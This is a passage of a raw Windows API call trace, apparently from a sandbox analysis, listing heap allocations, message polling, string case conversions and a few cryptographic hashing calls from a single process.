(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0267.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0267.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0267.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0267.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0267.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0267.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0267.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0267.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0267.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0267.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0267.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0267.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0267.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0267.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0267.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0267.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0267.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0267.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0267.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0267.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0267.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0267.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0267.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.054] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0267.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0267.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0267.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0267.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0267.055] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2698) returned 1 [0267.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0267.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0267.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0267.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0267.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.057] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0267.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0267.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0267.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0267.057] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0267.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.058] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0267.058] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0267.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0267.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0267.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.058] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0267.058] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.058] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0267.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0267.058] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.059] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.059] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.059] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.059] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0267.059] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.059] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0267.059] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.059] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.059] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.059] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.059] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.060] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.060] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.060] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0267.060] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.060] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0267.060] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.060] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.060] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.060] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.060] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.060] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.060] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.061] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0267.061] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.061] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0267.061] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.061] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.061] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.061] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.061] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.061] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.061] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.061] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.061] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.062] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0267.062] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.062] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0267.062] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.062] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.062] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.062] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.062] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.062] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.062] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.062] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.062] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.062] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.063] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.063] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0267.063] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.063] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0267.063] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.063] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.063] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.063] CryptCreateHash (in: hProv=0xad2698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0267.063] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.063] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.063] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.063] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.064] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0267.064] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.064] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.064] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.064] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.064] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.064] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.064] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.064] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.064] CryptHashData (hHash=0xaa5820, pbData=0x24b1c28, dwDataLen=0x3, dwFlags=0x1) returned 1 [0267.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0267.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0267.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0267.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: 